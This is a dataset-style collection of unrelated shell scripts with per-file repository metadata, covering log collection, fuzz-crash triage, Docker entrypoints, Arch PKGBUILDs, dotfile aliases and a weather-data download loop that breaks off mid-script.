(cd ${COLLECT_NAME_DIR} ; ${IONICE_CMD} ${NICE_CMD} ${TAR_CMD} ${COLLECT_NAME_DIR}/${COLLECT_NAME}.tar -T ${VAR_LOG_INCLUDE_LIST} -X ${RUN_EXCLUDE} -X ${ETC_EXCLUDE} -X ${VAR_LOG_EXCLUDE} ${COLLECT_INCLUDE} 2>>${COLLECT_ERROR_LOG} 1>>${COLLECT_ERROR_LOG} )
log_space "after first tar .....:"
(cd ${COLLECT_NAME_DIR} ; ${IONICE_CMD} ${NICE_CMD} ${UNTAR_CMD} ${COLLECT_NAME_DIR}/${COLLECT_NAME}.tar 2>>${COLLECT_ERROR_LOG} 1>>${COLLECT_ERROR_LOG} )
log_space "after first untar ...:"
rm -f ${COLLECT_NAME_DIR}/${COLLECT_NAME}.tar
log_space "after delete tar ....:"
if [ "${SKIP_MASK}" != "true" ]; then
# Run password masking before final tar
dlog "running /usr/local/sbin/collect_mask_passwords ${COLLECT_NAME_DIR} ${EXTRA_DIR}"
/usr/local/sbin/collect_mask_passwords ${COLLECT_NAME_DIR} ${EXTRA_DIR}
log_space "after passwd masking :"
fi
(cd ${COLLECT_BASE_DIR} ; ${IONICE_CMD} ${NICE_CMD} ${TAR_ZIP_CMD} ${COLLECT_NAME_DIR}.tgz ${COLLECT_NAME} 2>/dev/null 1>/dev/null )
log_space "after first tarball .:"
mkdir -p ${COLLECT_NAME_DIR}/${FLIGHT_RECORDER_PATH}
(cd /${FLIGHT_RECORDER_PATH} ; ${TAR_ZIP_CMD} ${COLLECT_NAME_DIR}/${FLIGHT_RECORDER_PATH}/${FLIGHT_RECORDER_FILE}.tgz ./${FLIGHT_RECORDER_FILE} 2>>${COLLECT_ERROR_LOG} 1>>${COLLECT_ERROR_LOG})
# Pull in an updated user.log which contains the most recent collect logs
# ... be sure to exclude any out of space logs
tail -30 /var/log/user.log | grep "COLLECT:" | grep -v "${FAIL_OUT_OF_SPACE_STR}" >> ${COLLECT_ERROR_LOG}
cp -a ${COLLECT_LOG} ${COLLECT_LOG}.last
cp -a ${COLLECT_ERROR_LOG} ${COLLECT_LOG}
cp -a ${COLLECT_LOG} ${COLLECT_NAME_DIR}/var/log
log_space "with flight data ....:"
(cd ${COLLECT_BASE_DIR} ; ${IONICE_CMD} ${NICE_CMD} ${TAR_ZIP_CMD} ${COLLECT_NAME_DIR}.tgz ${COLLECT_NAME} 2>>${COLLECT_ERROR_LOG} 1>>${COLLECT_ERROR_LOG} )
log_space "after collect .......:"
rm -rf ${COLLECT_NAME_DIR}
rm -f ${VAR_LOG_INCLUDE_LIST}
log_space "after cleanup .......:"
# Check for collect errors
# Only out of space error is enough to fail this hosts's collect
collect_errors ${HOSTNAME}
RC=${?}
rm -f ${COLLECT_ERROR_LOG}
if [ ${RC} -ne 0 ] ; then
rm -f ${COLLECT_NAME_DIR}.tgz
ilog "${FAIL_OUT_OF_SPACE_STR} ${COLLECT_BASE_DIR}"
else
ilog "collect of ${COLLECT_NAME_DIR}.tgz succeeded"
echo "${collect_done}"
fi
| true |
adf7b7f6256372654bcdf394d02e76d2bf857734 | Shell | Thiefyface/-_- | /buckets.sh | UTF-8 | 3,351 | 3.71875 | 4 | [] | no_license | #!/bin/bash -x
if [ -z $1 ]; then
echo "[x.x] Usage:"
echo "$0 <fuzz_binary> <fuzz_binary_options>"
exit
fi
mkdir crash_logs 2>/dev/null
mkdir crash_logs/asan_dir 2>/dev/null
mkdir crash_logs/segv_dir 2>/dev/null
mkdir crash_logs/other_dir 2>/dev/null
mkdir crash_logs/dups 2>/dev/null
mkdir pocs 2>/dev/null
mkdir pocs/asan_dir 2>/dev/null
mkdir pocs/segv_dir 2>/dev/null
mkdir pocs/other_dir 2>/dev/null
mkdir pocs/dups 2>/dev/null
export ASAN_OPTIONS=detect_leaks=0,allocator_may_return_null=1
# for the afl crashes
for i in `ls ./id* | grep crashes`; do
if [ -f crash_logs/`basename $i`.txt ]; then
#echo "Old Entry: $i"
continue
else
echo "New Entry: $i"
#gdb -ex run -ex quit --args $* $i 2>&1 | tee crash_logs/`basename $i`.txt
$* $i 2>&1 | tee crash_logs/`basename $i`.txt
echo "*****************************"
fi
done
for i in `ls ./crash-* | grep -v ".bak$"`; do
echo $i
if [ -f crash_logs/`basename $i`.txt ]; then
#echo "Old Entry: $i"
continue
else
echo "New Entry: $i"
#gdb -ex "set confirm off" -ex run -ex quit --args $* $i 2>&1 | tee crash_logs/`basename $i`.txt
$* $i 2>&1 | tee crash_logs/`basename $i`.txt
echo "*****************************"
fi
done
cd crash_logs
touch asan_buckets.txt
touch sigsegv_buckets.txt
touch other_buckets.txt
logcount=$(find . -name "crash-*.txt" | wc -l)
echo "[^_^] Processing $logcount logs"
sigseg=0
asan=0
other=0
dups=0
# sort these first
for i in `grep -L -e "SEGV" -e "ERROR: AddressSanitizer" crash-*.txt`; do
crash=$(basename `echo "$i"` | cut -d "." -f 1)
echo $crash >> other_buckets.txt
other=$(( other + 1 ))
mv $i other_dir
mv ../$crash ../pocs/other_dir
done
export IFS=$'\n'
for i in `ls ./crash-*.txt`; do
# grep return 1 on fail...
summary="$(grep "ERROR: AddressSanitizer" $i | cut -d " " -f 2- | sort -u)"
if [ $? -eq 0 ]; then
grep "$summary" asan_buckets.txt
if [ $? -eq 1 ]; then
crash=$(basename `echo "$i"` | cut -d "." -f 1)
echo $crash >> asan_buckets.txt
echo $summary >> asan_buckets.txt
echo "--------------------------------" >> asan_buckets.txt
asan=$(( asan + 1 ))
mv $i asan_dir
mv ../$crash ../pocs/asan_dir
continue
fi
fi
summary="$(grep -r "SIGSEGV" -A 5 $i | cut -d "." -f 2- | grep -v -- '--' | tr '\n' '|' )"
if [ $? -eq 0 ]; then
grep "$summary" sigsegv_buckets.txt
if [ $? -eq 1 ]; then
crash=$(basename `echo "$i"` | cut -d "." -f 1)
echo $crash >> sigsegv_buckets.txt
echo $summary >> sigsegv_buckets.txt
echo "--------------------------------" >> sigsegv_buckets.txt
sigseg=$(( sigseg + 1 ))
mv $i segv_dir
mv ../$crash ../pocs/segv_dir
continue
fi
fi
# anything left in this dir is a dup or a new crash...
mv $i dups
dups=$(( dups + 1 ))
crash=$(basename `echo "$i"` | cut -d "." -f 1)
mv ../$crash ../pocs/dups
done
echo "[>_>]*****Stats*******[<_<]"
echo "[S_S] Sigsegv: $sigseg"
echo "[A_A] Asan : $asan"
echo "[O.o] Other : $other"
echo "[d.d] dups : $dups"
| true |
3a8abced034bc9a0950b1d4aa5b4af19de507d9b | Shell | kotobot/memsql-docker-quickstart | /memsql-entrypoint.sh | UTF-8 | 310 | 2.90625 | 3 | [] | no_license | #!/bin/bash
set -e
if [ "$1" = "memsqld" ]; then
# Start up the cluster
memsql-ops start
memsql-ops memsql-start --all
memsql-ops memsql-list
# Tail the logs to keep the container alive
exec tail -F /memsql/master/tracelogs/memsql.log /memsql/leaf/tracelogs/memsql.log
fi
exec "$@"
| true |
7a910599f6c45cb5544a48badea37adf0683d45a | Shell | fitzfitsahero/fitzfitsahero | /scripts/twitterXML.sh | UTF-8 | 248 | 2.671875 | 3 | [] | no_license | #!/bin/sh
# This script pulls down an xml feed of the supplied user as the first command line option
# The .twittercreds_ file has the format- username:password
curl -u `cat .twittercreds_fitz` http://twitter.com/statuses/user_timeline/$1.xml
| true |
e03e87a092f5559eb6023cfaa4f17c8cd32fcd8d | Shell | Zacharis278/music-madness | /manifests/scripts/generate-sha.sh | UTF-8 | 174 | 2.75 | 3 | [] | no_license | #!/bin/bash
set -e
# Capture the SHA of the built client content
SHA=`find ./bracket -type f -print0 | xargs -0 shasum | shasum`
# Return as JSON
echo "{\"sha\": \"$SHA\"}" | true |
5c2d975848162f62352e663b4f48e0808e1ea9d7 | Shell | loknjinu13/week4scripts | /README.md | UTF-8 | 502 | 2.9375 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash -x
#week4scripts
title="Week4scripts"
RIGHT_NOW=$(date +"%x %r %z")
TIME_STAMP="updated on $RIGHT_NOW by $USER"
#### Functions
drive_space ()
{
echo "<h3> Filesystem Space </h3>"
echo "<pre>"
df
echo "</pre>"
}
SWAP_File ()
{
echo "<h3>SwapFile space allocation</h2>"
echo "<pre>"
dd if=/dev/zero of=cache1 bs=1024k count=30
echo "</pre>"
}
cat <<- _EOF_
<html>
<head>
<title>
$title
</title>
</head>
<body>
<p>$TIME_STAMP</p>
$SWAP_File
$(drive_space)
</body>
</html>
_EOF_
| true |
020d16e764c2d4af5c2a15a40b818d304d215af2 | Shell | longlonghash/fluidex-backend | /stop.sh | UTF-8 | 964 | 3.375 | 3 | [] | no_license | #!/bin/bash
set -uex
source ./common.sh
DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" > /dev/null 2>&1 && pwd)"
EXCHANGE_DIR=$DIR/dingir-exchange
PROVER_DIR=$DIR/prover-cluster
STATE_MNGR_DIR=$DIR/rollup-state-manager
FAUCET_DIR=$DIR/regnbue-bridge
function kill_tasks() {
# kill last time running tasks:
ps aux | grep 'fluidex-backend' | grep -v grep | awk '{print $2 " " $11}'
kill -9 $(ps aux | grep 'fluidex-backend' | grep -v grep | awk '{print $2}') || true
# tick.ts
# matchengine
# rollup_state_manager
# coordinator
# prover
}
function stop_docker_compose() {
dir=$1
name=$2
docker-compose --file $dir/docker/docker-compose.yaml --project-name $name down
docker_rm $dir/docker/data -rf
}
function stop_docker_composes() {
stop_docker_compose $EXCHANGE_DIR exchange
stop_docker_compose $PROVER_DIR prover
stop_docker_compose $STATE_MNGR_DIR rollup
stop_docker_compose $FAUCET_DIR faucet
}
kill_tasks
stop_docker_composes
| true |
9b5065a21eff34c5efb18bb969405b14010a6315 | Shell | hughec1329/135_project | /stripnet.sh | UTF-8 | 217 | 2.734375 | 3 | [] | no_license | #!/bin/bash
# script to strip out peeps belonging to top nets.
nets=$(cat ./topnets | awk -F " " '{print $2}')
# top 100 nets
for t in $nets
do
./getnet.sh /home/hugh/data/fb_mhrw.txt $t
echo "done " $t
done
| true |
d6e524ec119d258d5aeeba1ed75bd1c2915e9157 | Shell | hanson007/LOL | /projectdata/apis/updata_app/templates/git_pull.sh | UTF-8 | 3,352 | 3.234375 | 3 | [] | no_license | #!/usr/bin/env bash
#####################
# version: 0.1
# name: xuebk
# time: 2017-05-30
# help: 系统更新程序.
#####################
# 加载系统层变量
source ~/.bash_profile
# 基础变量
cd `dirname $0`
# 本程序执行目录
BIN_DIR=$(cd "$(dirname "$0")"; pwd)
# #### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
# 基础
function CheckUser(){
# 检测当前用户是否 为tomcat 用户.
check_user=`whoami`
if [ "$check_user" != "tomcat" ]
then
echo "You are '$check_user' is not tomcat" | tee -a ${STDOUT_FILE}
exit 2
fi
}
# #### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
CheckUser
##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
Name="{{ App }}"
BIN_DIR="{{ data.BIN_DIR }}"
CODE_DIR="{{ data.CODE_DIR }}"
Bin_Start="{{ data.Bin_Start }}"
Bin_Stop="{{ data.Bin_Stop }}"
{% if data.Bin_Config %}
Bin_Config="{{ data.Bin_Config }}"
{% else %}
Bin_Config="echo ok"
{% endif %}
giturl="{{ data.giturl }}"
commitid="{{ commit_id }}"
##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
echo "source /home/tomcat/.bash_profile && cd ${BIN_DIR} && ${Bin_Stop}"
# source /home/tomcat/.bash_profile && cd ${BIN_DIR} && ${Bin_Stop}
echo "source /home/tomcat/.bash_profile && [ -d '${BIN_DIR}/${CODE_DIR}/' ] && rm -rf ${BIN_DIR}/${CODE_DIR}/*"
# source /home/tomcat/.bash_profile && [ -d '${BIN_DIR}/${CODE_DIR}/' ] && rm -rf ${BIN_DIR}/${CODE_DIR}/*
echo "source /home/tomcat/.bash_profile && [[ -d '${BIN_DIR}/.git-${Name}' ]] && mv ${BIN_DIR}/.git-${Name} ${BIN_DIR}/${CODE_DIR}/.git"
# source /home/tomcat/.bash_profile && [[ -d '${BIN_DIR}/.git-${Name}' ]] && mv ${BIN_DIR}/.git-${Name} ${BIN_DIR}/${CODE_DIR}/.git
##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
echo "source /home/tomcat/.bash_profile && mkdir -p ${BIN_DIR}/${CODE_DIR}/"
# source /home/tomcat/.bash_profile && mkdir -p ${BIN_DIR}/${CODE_DIR}/
echo "source /home/tomcat/.bash_profile && cd ${BIN_DIR}/${CODE_DIR}/ && git checkout master 1>/dev/null"
# source /home/tomcat/.bash_profile && cd ${BIN_DIR}/${CODE_DIR}/ && git checkout master 1>/dev/null
echo "source /home/tomcat/.bash_profile && cd ${BIN_DIR}/${CODE_DIR}/ && git checkout ./. 1>/dev/null"
# source /home/tomcat/.bash_profile && cd ${BIN_DIR}/${CODE_DIR}/ && git checkout ./. 1>/dev/null
echo "source /home/tomcat/.bash_profile && cd ${BIN_DIR}/${CODE_DIR}/ && git pull origin master"
# source /home/tomcat/.bash_profile && cd ${BIN_DIR}/${CODE_DIR}/ && git pull origin master
##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
echo "source /home/tomcat/.bash_profile && [[ -d '${BIN_DIR}/${CODE_DIR}/.git' ]] && mv ${BIN_DIR}/${CODE_DIR}/.git ${BIN_DIR}/.git-${Name}"
# source /home/tomcat/.bash_profile && [[ -d '${BIN_DIR}/${CODE_DIR}/.git' ]] && mv ${BIN_DIR}/${CODE_DIR}/.git ${BIN_DIR}/.git-${Name}
echo "source /home/tomcat/.bash_profile && cd ${BIN_DIR} && ${Bin_Config} 1>/dev/null"
# source /home/tomcat/.bash_profile && cd ${BIN_DIR} && ${Bin_Config} 1>/dev/null
echo "source /home/tomcat/.bash_profile && cd ${BIN_DIR} && ${Bin_Start}"
# source /home/tomcat/.bash_profile && cd ${BIN_DIR} && ${Bin_Start}
##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### | true |
5b7a64238b80e62fa96128be7546c8429ac38535 | Shell | delkyd/alfheim_linux-PKGBUILDS | /python-algopy/PKGBUILD | UTF-8 | 1,485 | 2.5625 | 3 | [] | no_license | # Contributor: Hector <hsearaDOTatDOTgmailDOTcom>
pkgbase=python-algopy
pkgname=('python2-algopy' 'python-algopy')
pkgver=0.5.3
pkgrel=1
pkgdesc='A tool for Algorithmic Differentiation (AD) and Taylor polynomial approximations.'
url='http://packages.python.org/algopy/'
license=("BSD")
arch=('any')
depends=()
makedepends=('python2-setuptools' 'python-setuptools')
options=('!libtool')
source=("https://pypi.python.org/packages/source/a/algopy/algopy-${pkgver}.zip")
sha1sums=('4ebb09d8cf1b11c69d02c4d6c8806462831037d4')
prepare() {
cd "$srcdir"
cp -a algopy-${pkgver} algopy-py2-${pkgver}
}
build() {
msg2 "Building algopy - Python2"
cd "${srcdir}/algopy-py2-${pkgver}"
python2 setup.py build
msg2 "Building algopy - Python3"
cd "${srcdir}/algopy-${pkgver}"
python setup.py build
}
package_python-algopy() {
depends=('python-numpydoc')
optdepends=()
msg2 "Installing algopy python3"
cd "${srcdir}/algopy-${pkgver}"
python setup.py install --root="${pkgdir}/" --optimize=1 --skip-build
# Remove left over directories from distribute utils.
find ${pkgdir} -type d -name "__pycache__" -exec rm -r {} \; -prune
}
package_python2-algopy() {
# depends=('python2-numpydoc')
optdepends=()
msg2 "Installing algopy python2"
cd "${srcdir}/algopy-py2-${pkgver}"
python2 setup.py install --root="${pkgdir}/" --optimize=1 --skip-build
# Remove left over directories from distribute utils.
find ${pkgdir} -type d -name "__pycache__" -exec rm -r {} \; -prune
}
| true |
8b100ff18c2d8060a3c698b2f010454df50c4e6c | Shell | Rephot/pterodactyl-images | /games/entrypoint.sh | UTF-8 | 1,443 | 3.5 | 4 | [
"MIT"
] | permissive | #!/bin/bash
cd /home/container
sleep 1
# Make internal Docker IP address available to processes.
export INTERNAL_IP=`ip route get 1 | awk '{print $NF;exit}'`
# Update Source Server
if [ ! -z ${SRCDS_APPID} ]; then
if [ ! -z ${SRCDS_BETAID} ]; then
if [ ! -z ${SRCDS_BETAPASS} ]; then
./steamcmd/steamcmd.sh +login anonymous +force_install_dir /home/container +app_update ${SRCDS_APPID} -beta ${SRCDS_BETAID} -betapassword ${SRCDS_BETAPASS} +quit
else
./steamcmd/steamcmd.sh +login anonymous +force_install_dir /home/container +app_update ${SRCDS_APPID} -beta ${SRCDS_BETAID} +quit
fi
else
./steamcmd/steamcmd.sh +login anonymous +force_install_dir /home/container +app_update ${SRCDS_APPID} +quit
fi
fi
cd /home/container/csgo
# Install Sourcemod/metamod
if [ -f SOURCE_FLAG ] || [ "${SOURCEMOD}" = 1 ]; then
echo "Updating Sourcemod/metamod..."
curl -L -o sourcemod.tar.gz "https://sourcemod.net/latest.php?os=linux&version=1.10" -o metamod.tar.gz "https://sourcemm.net/latest.php?os=linux&version=1.11"
tar -xf sourcemod.tar.gz
tar -xf metamod.tar.gz
rm sourcemod.tar.gz metamod.tar.gz
echo "Done updating Sourcemod/metamod!"
fi
cd /home/container
# Replace Startup Variables
MODIFIED_STARTUP=`eval echo $(echo ${STARTUP} | sed -e 's/{{/${/g' -e 's/}}/}/g')`
echo ":/home/container$ ${MODIFIED_STARTUP}"
# Run the Server
eval ${MODIFIED_STARTUP}
| true |
13a886a560b2da9fffc30cc9a558aef4d90eacc9 | Shell | tbbrown/GradientDistortionUnwarpOnly | /CheckForGdcFiles.sh | UTF-8 | 2,200 | 4.625 | 5 | [] | no_license | #!/bin/bash
#
# Function description
# Show usage information for this script
#
usage() {
local scriptName=$(basename ${0})
echo ""
echo " Usage: ${scriptName} --checkdir=<check-dir>"
echo ""
}
#
# Function description
# Get the command line options for this script
#
# Global output variables
# ${checkdir} - directory to check
#
get_options() {
local scriptName=$(basename ${0})
local arguments=($@)
# initialize global output variables
unset checkdir
# parse arguments
local index=0
local numArgs=${#arguments[@]}
local argument
while [ ${index} -lt ${numArgs} ]; do
argument=${arguments[index]}
case ${argument} in
--help)
usage
exit 1
;;
--checkdir=*)
checkdir=${argument/*=/""}
index=$(( index + 1 ))
;;
*)
usage
echo "ERROR: Unrecognized Option: ${argument}"
exit 1
;;
esac
done
# check required parameters
if [ -z ${checkdir} ]; then
usage
echo "ERROR: <check-dir> not specified"
exit 1
fi
# report
echo "-- ${scriptName}: Specified command-line options - Start --"
echo " checkdir: ${checkdir}"
echo "-- ${scriptName}: Specified command-line options - End --"
}
#
# Main processing
#
main() {
get_options $@
local filesCheckedCount=0
local failuresCount=0
filelist=`find ${checkdir} -name "*.nii.gz" | grep --invert-match "_gdc"`
for image_file in ${filelist} ; do
filesCheckedCount=$(( filesCheckedCount + 1 ))
image_file_base=${image_file%.nii.gz}
gdc_file=${image_file_base}_gdc.nii.gz
if [ ! -f "${gdc_file}" ]; then
echo "FAILURE: ${gdc_file} should exist but does not"
failuresCount=$(( failuresCount + 1 ))
fi
done
echo "-- ${scriptName}: Results - Start --"
echo " filesCheckedCount: ${filesCheckedCount}"
echo " failuresCount: ${failuresCount}"
echo "-- ${scriptName}: Results - End --"
}
# Invoke the main function
main $@
| true |
600ce902049c4104337b2b0f3d6bb04ece6677f5 | Shell | velociraptor014/Scripts | /BASH/theconditionofdeath.sh | UTF-8 | 620 | 3.59375 | 4 | [] | no_license | #!/bin/sh
echo "Ce script étudie l'usage des conditions IF-FI"
echo "---------------------------------------------"
echo "Alors, nous allons prendre un exemple :"
# -------------------------------------------------
echo "Choisissez entre 'on', 'off' et 'middle'"
read DEATH
echo "You have choosen $DEATH"
echo PLEASE
sleep 1
echo WAIT
sleep 3
# - - - - - - - - - - - - - - - - - - - - - - - - -
if [ $DEATH = off ]; then
echo "Il est mort"
elif [ $DEATH = on ]; then
echo "Il est vivant"
elif [ $DEATH = middle ]; then
echo "Il est quelque chose mais je ne sais pas quoi !"
else
echo "Réponse incorrectesh"
fi
| true |
22d5362580e1481bea3fa1c4f3b02cf8aff1371d | Shell | itga/mip-microservices-infrastructure | /demo/frontend/portal/run.sh | UTF-8 | 416 | 2.796875 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-3.0-only",
"MIT",
"AGPL-3.0-only"
] | permissive | #!/bin/bash
set -e
META_DB_PROJECT=${META_DB_PROJECT:-~/Workspace/GitLab/mip-private/meta-db}
SCIENCE_DB_PROJECT=${SCIENCE_DB_PROJECT:-~/Workspace/GitLab/mip-private/adni-merge-db}
rsync -ar --delete --exclude=".keep" --exclude=".git" $META_DB_PROJECT/ src/meta-db/
rsync -ar --delete --exclude=".keep" --exclude=".git" $SCIENCE_DB_PROJECT/ src/science-db/
if [ -z "$@" ]; then
vagrant up
else
vagrant $@
fi
| true |
5523fa672adf0e8977b1a2bc96dde16f9ab49423 | Shell | FSMaxB/lfs-me-repos | /blfs-7.5/dmenu-4.5 | UTF-8 | 515 | 3.046875 | 3 | [] | no_license | #!/bin/bash
pkgname=dmenu
pkgver=4.5
pkgver_postfix=
sources=( "http://dl.suckless.org/tools/${pkgname}-${pkgver}.tar.gz" )
sha1sums=( '70c1a13b950b7b0cb1bc35e30c6e861a78359953' )
lfs_me_prepare() {
tar -xf "${sources_dir}/${pkgname}-${pkgver}.tar.gz" -C "$build_dir"
cd "${build_dir}/${pkgname}-${pkgver}"
}
lfs_me_build() {
make X11INC="${XORG_PREFIX}/include" X11LIB="${XORG_PREFIX}/lib"
}
lfs_me_check() {
return
}
lfs_me_install() {
make PREFIX=/usr DESTDIR="$fakeroot_dir" install
}
| true |
ece0508e976f79ac3e09db3b151003de687b7bdb | Shell | BenjaminAbdi/NNVoiceActivityDetector | /bash_scripts/oggToWav.sh | UTF-8 | 275 | 3.375 | 3 | [] | no_license | search_dir="./"
folder="./output/"
base_name="fable"
cpt=0
for filename in `ls $search_dir`; do
filename_without_ext="${filename%.*}"
let cpt=cpt+1
if [[ $filename == *".ogg"* ]]
then
#echo $filename "sound-"$cpt".wav"
sox $filename -c 1 "sound-"$cpt".wav"
fi
done
| true |
8b06401ed396c9f33640d90e8cd3c061b58bd244 | Shell | mug31416/PubAdmin-Discourse | /src/SEGmodel/sensitivityRandCondModelRuns.sh | UTF-8 | 1,058 | 2.625 | 3 | [] | no_license | #!/usr/bin/env bash
export F=2001
export H=101
export mt="cond_rand"
export mt1="cond_svm"
date > log.summary_${mt}.txt
echo ${mt} >> log.summary_${mt}.txt
for feat in wlf_f4bert_head wlf_head bert_head wlf_bert_head f7bert_head; do
for l in CHANGE_IN_RULE NO_CHANGE_IN_RULE; do
python -u trainModel.py --train_file ../../data4Modeling/SecPassageClassification/trainDockets_2019-0430.jsonl --test_file ../../data4Modeling/SecPassageClassification/testDockets_2019-0430.jsonl --head_feat_qty $H --feat_qty $F --feat_cache_dir ../../data4Modeling/SecPassageClassification/${feat}_${F}_${H} --label ${l} --use_nodseq_model --filter_all --use_prior --model_file ${feat}_${F}_${H}/${mt1}_${feat}_${l} 2>&1|tee log.${mt}_${feat}_${l}.txt ;
done;
echo NO_CHANGE_IN_RULE ${feat} >> log.summary_${mt}.txt ;
tail -n 13 log.${mt}_${feat}_NO_CHANGE_IN_RULE.txt >> log.summary_${mt}.txt ;
echo CHANGE_IN_RULE ${feat} >> log.summary_${mt}.txt ;
tail -n 13 log.${mt}_${feat}_CHANGE_IN_RULE.txt >> log.summary_${mt}.txt ;
done
| true |
20368272af022572c33e8b69287a9c8ace4d31f4 | Shell | tanelpak/skriptimine | /praks9/yl2 | UTF-8 | 250 | 2.671875 | 3 | [] | no_license | #!/bin/bash
#
#kujund
echo -n "Sisesta ridade arv: "
read r
echo -n "Sisesta tärnide arv read: "
read t
for (( i = 1; i <= $r; i++ ))
do
echo -n "$i"
for (( j = 1; j <= $t; j++ ))
do
echo -n "*"
done
echo ""
done
#
#skripti lõpp
#
| true |
a2d6f211930629c68209abdb18f1b5f6556f9070 | Shell | ikhaliq42/GridCellModel | /manuscripts/pnas/SI_text/src/copy_to_dropbox.sh | UTF-8 | 239 | 2.9375 | 3 | [] | no_license | #!/bin/bash
dst_dir=~/Dropbox/Independent_grids_and_gamma/noise/
files="
SI_text.pdf
"
# Copy to dropbox
echo "Copying to main figures to dropbox..."
echo $files
echo
ls $dst_dir
for f in $files
do
cp -rv $f $dst_dir
done
| true |
7a0391287dbbaf6e422b330b41cfeae3383e47c0 | Shell | jamyspex/dotfiles | /.aliases.sh | UTF-8 | 1,321 | 3.390625 | 3 | [] | no_license | # If fasd is installed and in use, add a bunch of
# aliases for it.
if command -v fasd >/dev/null 2>&1; then
# Any
alias a='fasd -a'
# Show/search/select
alias s='fasd -si'
# Directory
alias d='fasd -d'
# File
alias f='fasd -f'
# Interactive directory selection
alias sd='fasd -sid'
# Interactive file selection
alias sf='fasd -sif'
# cd - same functionality as j in autojump
alias z='fasd_cd -d'
# Interactive cd
alias zz='fasd_cd -d -i'
# Vim
alias v='fasd -f -e vim'
fi
if command -v nvim > /dev/null 2>&1; then
alias n=nvim
alias vi=nvim
alias vim=nvim
fi
_has() {
type $1>/dev/null 2>&1
}
# Safe delete
if [ ! -d ~/.trash ]; then
mkdir ~/.trash
fi
alias rm='echo "rm disabled! Use del for safe delete"'
if _has gio; then
del(){
gio trash "$@"
}
else
del(){
mv "$@" ~/.trash
}
fi
alias jupyter-notebook="~/.local/bin/jupyter-notebook --no-browser"
# More ls aliases.
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
# Replace 'ls' with exa if it is available.
if command -v exa > /dev/null 2>&1; then
alias ls="exa --git"
alias ll="exa --all --long --git"
alias la="exa --all --binary --group --header --long --git"
alias l="exa --git"
fi
alias t='tmux attach'
| true |
19bd809441364df4fd77e3483e616eb0579b2777 | Shell | AsherBond/cato | /tools/tag_release_and_bump.sh | UTF-8 | 593 | 4.0625 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
set -x
## this script is to be run in a local git repo only
version=$1
if [ "$version" = "" ] ; then
echo "usage: $0 <version>"
exit 1
fi
REPO_HOME=`git rev-parse --show-toplevel`
# 'latest' version
git tag -d latest
git push origin :refs/tags/latest
# supplied version
git tag -d $version
git push origin :refs/tags/$version
git pull
echo $version > $REPO_HOME/VERSION
git add $REPO_HOME/VERSION
git commit -m "Bumped Version to [$version]."
git push
git tag -a latest -m "Version $version"
git tag -a $version -m "Version $version"
git push --tags --force
| true |
ba6a2e20860090e805c2a2680ad30322582feeda | Shell | 24HOURSMEDIA/docker-dxstack1-synced | /docker/php-fpm/start.sh | UTF-8 | 360 | 2.828125 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env sh
export DX_PHPFPM_EXTRA_CONF_DIR=$DX_VOLUME_ETC/php-fpm.d
mkdir -p $DX_PHPFPM_EXTRA_CONF_DIR
# copy example file to extra conf dir if not exist
if [ -f "$DX_PHPFPM_EXTRA_CONF_DIR/www.conf.example" ]; then
echo ""
else
cat ./php-fpm/etc/php-fpm.d/www.conf.example | ./parse_env.sh > $DX_PHPFPM_EXTRA_CONF_DIR/www.conf.example
fi
php-fpm
| true |
eb4549e5d204a5964c400e3a56dda8ed4c37c6b9 | Shell | Azkali/BananaPi | /BananaCreator/bashHelper.sh | UTF-8 | 654 | 2.78125 | 3 | [] | no_license | #!/usr/bin/env bash
wget -q -O - https://apt.mopidy.com/mopidy.gpg | sudo apt-key add -
&& sudo wget -q -O /etc/apt/sources.list.d/mopidy.list https://apt.mopidy.com/stretch.list
&& wget https://raw.githubusercontent.com/adafruit/Raspberry-Pi-Installer-Scripts/master/adafruit-pitft.sh
&& curl https://raw.githubusercontent.com/adafruit/Raspberry-Pi-Installer-Scripts/master/retrogame.sh >retrogame.sh
&& sudo apt-get update && sudo apt-get upgrade && sudo apt-get install python3-dev python3-pip python-dev python-pip python-PIL python-imaging -y
&& pip install Mopidy-Iris
if [$? -eq 0]; then
echo OK
sudo python3 ./Installer.py
else
echo FAIL
fi | true |
39c777b7c034378e78b6c4194deedc8ecac4ba9d | Shell | SettRaziel/wrf_archlinux | /wrf_run/data_fetch/gfs_fetch.sh | UTF-8 | 3,381 | 3.953125 | 4 | [
"Zlib",
"JasPer-2.0",
"Libpng",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/bash
# This script loads the required input data for a 180 h forecast run
# ${1} matches the required date yyyymmdd
# ${2} matches the required timestamp
# ${3} is the storage path
# ${4} is the model resolution [0p25, 0p50, 1p00]
# ${5} the time period for the model run
# define terminal colors
. "${COLOR_PATH}"
# parent url to the noaa data server as of 2020-06-01
# source: https://www.nco.ncep.noaa.gov/pmb/products/gfs/#GFS
GFS_URL="https://nomads.ncep.noaa.gov/pub/data/nccf/com/gfs/prod/"
# function to fetch the input data with curl
gfs_fetch_curl () {
# Define a number of retries and try to download the files
for i in $(seq -f %03g 0 3 "${5}"); do
RETRIES=0
while [ "${RETRIES}" -lt 10 ]; do
# -w return http code, -C continue if interrupted, -o define output; loop breaks if file was loaded successfully
RETURN_CODE=$(curl -w "%{http_code}\n" -C - -o "${3}"/gfs.t"${2}"z.pgrb2."${4}".f"${i}" "${GFS_URL}"gfs."${1}"/"${2}"/atmos/gfs.t"${2}"z.pgrb2."${4}".f"${i}")
if [[ "${RETURN_CODE}" -eq 200 ]]; then
break
fi
((RETRIES++))
# in addition to the http codes curl returns 000 if it ran into a timeout
if [[ "${RETURN_CODE}" =~ [4-5][0-9]{2}$ ]] || [[ "${RETURN_CODE}" =~ [0]{3}$ ]]; then
if [[ "${RETURN_CODE}" =~ [0]{3}$ ]]; then
RETURN_CODE="Timeout"
fi
